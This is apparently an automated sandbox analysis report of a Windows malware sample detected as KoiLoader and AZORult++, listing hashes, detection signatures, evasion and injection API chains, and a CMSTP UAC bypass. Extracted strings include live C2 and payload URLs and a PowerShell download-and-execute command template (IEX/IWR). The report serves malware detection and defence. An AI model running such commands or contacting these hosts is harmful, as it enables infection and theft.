Windows Analysis Report
JT1yqn67un.exe

Overview

General Information

Sample name: JT1yqn67un.exe
renamed because original name is a hash value
Original sample name: 9e88e85a46486f7f56b3aaba6e29737c.exe
Analysis ID: 1528834
MD5: 9e88e85a46486f7f56b3aaba6e29737c
SHA1: c33d28a63c240f4677b185e7cbc918da3d4f49ec
SHA256: deb72a5ebd26b40dc1847314d896b4e768f6f14d95fcfcbf1046c65518df5883
Tags: exe, KoiLoader, user-abuse_ch

Detection

AZORult++, KoiLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Contains functionality to bypass UAC (CMSTPLUA)
Detected AZORult++ Trojan
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected KoiLoader
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to detect virtual machines
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Found evasive API chain (may stop execution after checking locale)
Found evasive API chain (may stop execution after checking mutex)
Machine Learning detection for sample
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Program does not show much activity (idle)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection

Source: JT1yqn67un.exe Avira: detected
Source: 00000000.00000002.1735347599.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: KoiLoader {"C2": "http://2.58.14.95/malto.php", "Payload url": "https://lacasadelverde.com/css"}
Source: JT1yqn67un.exe ReversingLabs: Detection: 71%
Source: JT1yqn67un.exe Virustotal: Detection: 58%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: JT1yqn67un.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_005E8710 InitializeCriticalSection,GetVolumeInformationW,StringFromGUID2,wsprintfA,CreateMutexW,GetLastError,WSAStartup,CryptAcquireContextA,CryptAcquireContextA,CoInitializeEx,ExpandEnvironmentStringsW,CreateFileW,ExitProcess, 0_2_005E8710
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_005E93B0 CryptGenRandom,HeapFree,GetProcessHeap,HeapFree,wsprintfA,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 0_2_005E93B0

Exploits

Source: Yara match File source: 0.2.JT1yqn67un.exe.5e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.JT1yqn67un.exe.bb0b78.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.JT1yqn67un.exe.bb0b78.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1735347599.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: JT1yqn67un.exe PID: 7460, type: MEMORYSTR

Privilege Escalation

Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_005E72E0 ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,lstrlenW,ExpandEnvironmentStringsW,GetSystemWow64DirectoryW,GetLastError,wnsprintfW,wnsprintfW,ExpandEnvironmentStringsW,wnsprintfW,SetFileAttributesW,lstrcpyW,GetUserNameW,NetUserGetInfo,NetApiBufferFree,CoInitializeEx,lstrlenW,wsprintfW,CoGetObject,CoUninitialize, 0_2_005E72E0
Source: JT1yqn67un.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: JT1yqn67un.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_00F0993E FindFirstFileExW,FindNextFileW,FindClose,FindClose, 0_2_00F0993E
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_005E89F0 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW, 0_2_005E89F0

Networking

Source: Malware configuration extractor URLs: http://2.58.14.95/malto.php
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_005E6410 inet_pton,inet_pton,htons,htons,inet_pton,htons,socket,socket,connect,connect,socket,connect,closesocket,select,recv,send,select,closesocket,closesocket,GetProcessHeap,HeapFree, 0_2_005E6410
Source: JT1yqn67un.exe String found in binary or memory: http://2.58.14.95/malto.php
Source: JT1yqn67un.exe, 00000000.00000002.1735347599.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp, JT1yqn67un.exe, 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp String found in binary or memory: http://2.58.14.95/malto.php%temp%
Source: JT1yqn67un.exe String found in binary or memory: https://lacasadelverde.com/css
Source: JT1yqn67un.exe, 00000000.00000002.1735347599.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp, JT1yqn67un.exe, 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp String found in binary or memory: https://lacasadelverde.com/css/c

E-Banking Fraud

Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_005E9250 EntryPoint,GetUserDefaultLangID,ExitProcess, 0_2_005E9250

System Summary

Source: 0.2.JT1yqn67un.exe.5e0000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.JT1yqn67un.exe.bb0b78.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_005E5C60 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle, 0_2_005E5C60
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_005E5FD0 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTempPathW,wnsprintfW,wnsprintfW,PathCombineW,CreateFileW,WriteFile,WriteFile,SetEndOfFile,SetFilePointer,wnsprintfW,RtlInitUnicodeString,RtlInitUnicodeString,RtlInitUnicodeString,GetCurrentProcess,SetFilePointer,WriteFile,FlushFileBuffers,SetEndOfFile,NtQueryInformationProcess,NtClose,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,NtClose,NtClose,NtClose,NtClose,CloseHandle, 0_2_005E5FD0
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_00F0FBC1 0_2_00F0FBC1
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_005E89F0 0_2_005E89F0
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_005E7C30 0_2_005E7C30
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_005E26A0 0_2_005E26A0
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_005E7710 0_2_005E7710
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_005E43D0 0_2_005E43D0
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_005E47D0 0_2_005E47D0
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: String function: 00F050E0 appears 33 times
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: String function: 00F03CE0 appears 82 times
Source: JT1yqn67un.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.JT1yqn67un.exe.5e0000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.JT1yqn67un.exe.bb0b78.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: classification engine Classification label: mal100.bank.troj.expl.evad.winEXE@1/0@0/0
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_005E6370 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle, 0_2_005E6370
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_005E6C60 VariantInit,CoCreateInstance,SysAllocString,SysFreeString,SysFreeString,SysAllocString,SysFreeString, 0_2_005E6C60
Source: JT1yqn67un.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\JT1yqn67un.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: JT1yqn67un.exe ReversingLabs: Detection: 71%
Source: JT1yqn67un.exe Virustotal: Detection: 58%
Source: C:\Users\user\Desktop\JT1yqn67un.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\JT1yqn67un.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\JT1yqn67un.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\JT1yqn67un.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\JT1yqn67un.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\JT1yqn67un.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\JT1yqn67un.exe Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\JT1yqn67un.exe Section loaded: samcli.dll
Source: C:\Users\user\Desktop\JT1yqn67un.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\JT1yqn67un.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\JT1yqn67un.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\JT1yqn67un.exe Section loaded: uxtheme.dll
Source: JT1yqn67un.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: JT1yqn67un.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: JT1yqn67un.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: JT1yqn67un.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: JT1yqn67un.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: JT1yqn67un.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: JT1yqn67un.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: JT1yqn67un.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: JT1yqn67un.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: JT1yqn67un.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: JT1yqn67un.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: JT1yqn67un.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Source: Yara match File source: 0.2.JT1yqn67un.exe.5e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.JT1yqn67un.exe.bb0b78.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.JT1yqn67un.exe.bb0b78.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1735347599.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: JT1yqn67un.exe PID: 7460, type: MEMORYSTR
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_00F01300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect, 0_2_00F01300
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_00F102D1 push ecx; ret 0_2_00F102E4

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: VMWare %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxTray.exe 0_2_005E89F0
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW, 0_2_005E89F0
Source: C:\Users\user\Desktop\JT1yqn67un.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Source: C:\Users\user\Desktop\JT1yqn67un.exe Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess
Source: C:\Users\user\Desktop\JT1yqn67un.exe File opened / queried: C:\Windows\System32\VBoxService.exe
Source: C:\Users\user\Desktop\JT1yqn67un.exe API coverage: 9.8 %
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_00F0993E FindFirstFileExW,FindNextFileW,FindClose,FindClose, 0_2_00F0993E
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_005E89F0 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW, 0_2_005E89F0
Source: JT1yqn67un.exe Binary or memory string: Hyper-V
Source: JT1yqn67un.exe, 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp Binary or memory string: POST%s|%s|hhlT6dDnStart%d|%sINITWindowsPowerShell\v1.0\powershell.exe -enc %S /c %Skernel32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirectionShellExecuteWshell32openReleaseSeShutdownPrivilege%Shttp://2.58.14.95/malto.php%temp%\%paths%%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exesd2.ps1sd4.ps1https://lacasadelverde.com/css/c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')"Hyper-VVMWareParallels Display AdapterRed Hat QXL controller%systemroot%\System32\VBoxService.exe%systemroot%\System32\VBoxTray.exe?
Source: JT1yqn67un.exe Binary or memory string: VMWare
Source: JT1yqn67un.exe Binary or memory string: %systemroot%\System32\VBoxService.exe
Source: JT1yqn67un.exe Binary or memory string: %systemroot%\System32\VBoxTray.exe
Source: C:\Users\user\Desktop\JT1yqn67un.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_00F076CB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00F076CB
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_00F01300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect, 0_2_00F01300
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_00F01710 mov ecx, dword ptr fs:[00000030h] 0_2_00F01710
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_005E7920 mov eax, dword ptr fs:[00000030h] 0_2_005E7920
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_005E5FD0 mov eax, dword ptr fs:[00000030h] 0_2_005E5FD0
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_00F0B779 GetProcessHeap, 0_2_00F0B779
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_00F05016 SetUnhandledExceptionFilter, 0_2_00F05016
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_00F049BE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00F049BE
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_00F04E89 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00F04E89

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_005E5C60 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle, 0_2_005E5C60
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: ExpandEnvironmentStringsW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetCurrentProcessId,OpenProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,GetWindowsDirectoryW,StrNCatW,VirtualAlloc,lstrcpyW,GetModuleFileNameW,ReadProcessMemory,ReadProcessMemory,CloseHandle,StrCmpIW, \explorer.exe 0_2_005E94B0
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: ExpandEnvironmentStringsW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetCurrentProcessId,OpenProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,GetWindowsDirectoryW,StrNCatW,VirtualAlloc,lstrcpyW,GetModuleFileNameW,ReadProcessMemory,ReadProcessMemory,CloseHandle,StrCmpIW, explorer.exe 0_2_005E94B0
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: ExpandEnvironmentStringsW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetCurrentProcessId,OpenProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,GetWindowsDirectoryW,StrNCatW,VirtualAlloc,lstrcpyW,GetModuleFileNameW,ReadProcessMemory,ReadProcessMemory,CloseHandle,StrCmpIW, explorer.exe 0_2_005E94B0
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_00F05125 cpuid 0_2_00F05125
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_00F04D70 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00F04D70
Source: C:\Users\user\Desktop\JT1yqn67un.exe Code function: 0_2_005E89F0 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW, 0_2_005E89F0
No contacted IP information